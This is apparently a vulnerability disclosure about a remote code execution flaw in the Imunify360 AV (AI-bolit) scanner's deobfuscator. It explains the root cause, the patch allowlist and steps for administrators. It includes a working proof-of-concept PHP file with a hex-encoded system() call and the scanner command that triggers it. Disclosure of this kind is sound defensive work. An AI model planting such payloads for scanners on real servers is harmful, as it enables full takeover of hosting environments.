Recently a critical Remote Code Execution issue was patched in the Imunify360 AV product. Imunify360 serves up to 56 million websites. Hosting companies should patch the issue immediately.
The information about this vulnerability has been spreading since the end of October, so we also recommend affected hosting companies to check whether their servers have been compromised.
Unfortunately there has been no statement released about the issue by Imunify360’s team, and no CVE has yet been assigned. At the same time, the issue has been publicly available on their Zendesk since November 4, 2025.
Based on our review of this vulnerability, we consider the CVSS score to be: 8.1 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C/CR:H/IR:H/AR:H).
Summary
Recently a remote code execution via malware execution vector was discovered in the imunify360AV (AI-bolit) version prior to v32.7.4.0. The vulnerability stems from the deobfuscation logic executing untrusted functions and payloads extracted from attacker supplied malware. An attacker-controlled payload can cause the deobfuscator to call dangerous PHP functions (for example system, exec, shell_exec, passthru, eval, etc.), resulting in arbitrary command execution and full compromise of the hosting environment.
A few other issues were patched. Here we describe one of the most critical.
Impact
Remote attackers can embed specifically crafted obfuscated PHP that matches imunify360AV (AI-bolit) deobfuscation signatures. The deobfuscator will execute extracted functions on attacker-controlled data, allowing execution of arbitrary system commands or arbitrary PHP code. Impact ranges from website compromise to full server takeover depending on hosting configuration and privileges.
Detection is non-trivial because the malicious payloads are obfuscated (hex escapes, packed payloads, base64/gzinflate chains, custom delta/ord transformations) and are intended to be deobfuscated by the tool itself.
imunify360AV (Ai-Bolit) is a malware scanner specialized in website-related files like php/js/html. By default, the scanner is installed as a service and works with a root privileges
Shared hosting escalation: On shared hosting, successful exploitation can lead to privilege escalation and root access depending on how the scanner is deployed and its privileges. if imunify360AV or its wrapper runs with elevated privileges an attacker could leverage RCE to move from a single compromised site to complete host control.
Technical Details
imunify360AV (Ai-Bolit) includes heuristics and deobfuscators to try to convert obfuscated/malicious PHP into readable code. Two problematic flows were identified:
- Eval-hex function pattern: a signature that matches (simplified) :
$data = "test";
$var1 = "\x73\x79\x73\x74\x65\x6d"; // "system"
$var2 = "\x74\x6f\x75\x63\x68..."; // arguments / command
$var3 = "\x70\x61\x63\x6b"; // "pack"
eval("$var3"($var2));- Delta/Ord flow deobfuscateDeltaOrd takes a string and a list of function names recovered from the obfuscated payload and then applies those functions in sequence using Helpers::executeWrapper
Both flows rely on Helpers::executeWrapper, which wraps call_user_func_array inside a try/catch and returns the function result. There is no validation that the function being invoked is safe, so if the attacker provides system, exec, shell_exec, eval, assert, etc., those functions will be executed.
Conditions for exploitation
The exploit requires the imunify360AV scanner to perform active deobfuscation during analysis. In practice this means running the scanner with the -y / --deobfuscate option enabled. Example invocation used during triage
php ai-bolit.php -y -j malware_exploit.phpDefault behavior
By default imunify360AV (AI-bolit) php CLI appears to disable deep deobfuscation. The codebase contains a guard that sets deobfuscation off unless explicitly enabled:
if (!defined('AI_DEOBFUSCATE')) {
define('AI_DEOBFUSCATE', false);
}
[...]
if (isset($options['deobfuscate']) || isset($options['y'])) {
define('AI_DEOBFUSCATE', true);
However, after checking how imunify360 AV calls the scanner wrapper we noticed the following:
./imav/malwarelib/scan/ai_bolit/scanner.py
def _cmd(
self,
filename,
intensity_ram,
progress_path,
*,
scan_type: str,
# ... parameters ...
):
cmd = [
"/opt/ai-bolit/wrapper",
AIBOLIT_PATH,
"--smart",
"--deobfuscate", # ALWAYS ENABLED!
"--avdb",
MalwareSignatures.AI_BOLIT_HOSTER,
"--no-html",
"--memory",
get_memory(intensity_ram),
# ...
]It means deobfuscation is always called, making this issue even more critical. This is used for all scan types:
- Background scans
- On-demand scans
- User-initiated scans
- Rapid account scans
Proof of Concept
<?php
$data = "test";
$payload = "\x73\x79\x73\x74\x65\x6d"("\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x6c\x33\x33\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x65\x63\x68\x6f\x20\x22\x44\x45\x46\x2d\x33\x36\x37\x38\x39\x22\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x6c\x33\x33\x74\x2e\x74\x78\x74");
eval("\x70\x61\x63\x6b"($payload));
?>Run the scanner on the poc.php. This will create a file in the tmp directory.
php ai-bolit.php -y -j poc.phpThe Patch
The root cause is the execution of untrusted function names and payloads during deobfuscation. The correct fix is to never call untrusted functions extracted from arbitrary files. Instead, deobfuscation should be performed in a purely syntactic way (string unescaping, safe decoding) without executing recovered functions.
The patch adds validation before executing any discovered function. This validation white list only only pure decoding, deterministic functions:
public static function isSafeFunc($func) {
$safeFuncs = [
'base64_decode','gzinflate','strrev','str_rot13','urldecode','substr','chr','ord',
];
return in_array(strtolower($func), $safeFuncs, true);
}Vendor response and disclosure
At the time of publication, CloudLinux (the vendor behind Imunify360 and Ai-Bolit) has not issued a formal security advisory or coordinated disclosure through CVE channels. The only public mention of this issue appears in a short Zendesk article. A previous case in 2021 also exposed a critical remote code execution vulnerability within Imunify360, underscoring the need for stronger vendor transparency and proactive public advisories in future incidents.
Recommended actions for administrators
Immediate: If you run imunify360AV (AI-bolit) any version prior to v32.7.4.0, apply vendor-supplied security updates or remove the tool until patched.
If you cannot patch immediately: restrict the imunify360AV (AI-bolit) execution environment (run in an isolated analysis VM/container with no network/filesystem access and minimal privileges).
Administrators should also contact CloudLinux / Imunify360 support to report potential exposure and confirm whether their environment has been affected. The vendor can provide information on detection of exploitation attempts, updated signatures, and post-incident guidance. Collaborative verification with the vendor is critical to assess whether this issue has been exploited in the wild and to ensure that all affected installations receive the proper security updates.
Timeline
